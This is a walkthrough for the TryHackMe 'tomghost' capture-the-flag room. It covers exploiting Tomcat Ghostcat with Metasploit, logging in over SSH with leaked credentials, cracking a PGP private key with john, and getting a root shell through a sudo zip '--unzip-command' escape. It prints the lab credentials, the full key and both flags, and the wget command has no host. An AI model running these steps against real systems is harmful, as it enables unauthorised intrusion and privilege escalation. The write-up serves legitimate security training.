# Challenges: tomghost (TryHackMe)

In this TryHackMe challenge, we’re tasked with compromising a Linux machine by gaining low-privileged access, escalating privileges, and collecting two flags: `user.txt` and `root.txt`. The target system runs Apache Tomcat and has a known vulnerability called **Ghostcat** (CVE-2020-1938). The room offers a mix of enumeration, vulnerability exploitation, key decryption, and privilege escalation. This walkthrough demonstrates a full exploitation path from reconnaissance to root access.

## Flags

![](https://i.imgur.com/fR0jVuM.png align="left")

\*\*Are you able to complete the challenge?  
\*\*The machine may take up to 5 minutes to boot and configure.

*Admins Note: This room contains inappropriate content in the form of a username that contains a swear word and should be noted for an educational setting. - Dark*

### Answer the questions below

Compromise this machine and obtain user.txt `THM{GhostCat_1s_so_cr4sy}`

Start by running an nmap scan:

`nmap -sC -sC 10.10.81.186`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1751981953321/da2764e7-fb80-4b70-ae4c-3f09a64a3609.png align="center")

Then we check this site:

`http://<IP_Address>:8080`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1751982036889/bdea427f-90bf-48c0-b9f7-db97d91bda74.png align="center")

We checked if there’s a CVE linked to Tomcat 9.0, as this site looked like an official documentation of Apache Tomcat, and there could be a lead from this:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1751982202666/4e24fab4-6f62-4714-a47c-564e2b6fb46b.png align="center")

I tried using Metasploit at first, but it wasn’t working right. Later on after researching through other writeups and ChatGPT i learned that I was supposed to use Metasploit but search ghostcat  
  
`msfconsole`  
  
`search ghostcat`  
  
`use auxiliary/admin/http/tomcat_ghostcat`  
  
`set RHOSTS <IP_Address>`  
  
`exploit`  
  
we’ll get the credentials of the user which will enable us to get low user access using SSH

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1751997381361/989daef6-acd6-4c02-9f26-d6dfca863f09.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1751998579211/be9e18e3-6d2f-43ba-90d2-59150c08f590.png align="center")

`ssh skyfuck@<IP_Address>`

```plaintext
skyfuck:8730281lkjlkjdqlksalks
```

`find / -type f -name user.txt 2> /dev/null`

`cat /home/merlin/user.txt`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752005930064/f2f50220-bfc2-4a75-a7e9-9d2b8b839e65.png align="center")

  
  
Checking the files here, we found `tryhackme.asc` file which is a **ASCII-armored** — it's a text-encoded file used by **PGP/GPG (Pretty Good Privacy)**. It can contain:

2. Escalate privileges and obtain root.txt `THM{Z1P_1S_FAKE}`  
    
    `ls`  
    
    `gpg --import tryhackme.asc`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752141157443/7e6bd316-5775-449e-8e7d-9f2856330778.png align="center")
    
    | File Purpose | Description |
    | --- | --- |
    | 🔑 **Public key** | Shared with others to **encrypt messages** or **verify signatures** |
    | 🔒 **Private key** | Kept **secret** to **decrypt messages** or **sign content** |
    | 📄 **Encrypted message** | Data encrypted using a public key |
    | ✍️ **Signed message** | Message + digital signature |
    
    ```bash
    -----BEGIN PGP PRIVATE KEY BLOCK-----
    Version: BCPG v1.63
    
    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
    kG6wLdznOpe4zaLA/vM=
    =dMrv
    -----END PGP PRIVATE KEY BLOCK-----
    ```
    
    using your machine you can get the asc file  
      
    `wget http://:8000/tryhackme.asc`  
      
    `gpg2john tryhackme.asc > hashfile`  
      
    `john hashfile —-wordlist=/usr/share/wordlists/rockyou.txt`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752140468174/c2603364-0119-48bf-b900-b51a1bd33907.png align="center")
    
    on the victim’s machine run:  
      
    `gpg —decrypt credential.pgp`  
    passphrase: alexandru
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752141922687/4d233eb3-af0b-4d78-8a28-ef4036275a64.png align="center")

we now have another user called merlin and we’ll run the `su merlin` on the victim’s machine  
  
`su merlin`

password: asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752142138368/da8dc6c4-e9b2-49b6-a645-a750c64049c7.png align="center")

sudo -l

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752142056382/428a1de0-6335-4810-a8b6-3a27a305c3fd.png align="center")

```bash
cd /tmp
echo "GTFO" > file.txt
sudo zip test.zip file.txt -T --unzip-command="sh -c /bin/sh"
```

  
`cd /tmp`

`echo "GTFO" > file.txt`

`sudo zip` [`test.zip`](http://test.zip) `file.txt -T --unzip-command="sh -c /bin/sh"`

`whoami`

`find / -type f -name root.txt 2> /dev/null`

`cat /root/root.txt`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752142314957/939bb862-9d87-4b42-9917-89e72f83eb10.png align="center")

This room provided a great mix of techniques useful in real-world pentesting — including identifying a vulnerable service (Tomcat Ghostcat), accessing sensitive files, decrypting a private key, and escalating privileges using a `sudo` misconfiguration with `zip`. It reinforced the importance of service enumeration, credential discovery, and GPG key handling. The final exploitation step using a malicious unzip command was a rewarding way to achieve root access and read the `root.txt` flag, completing the challenge.
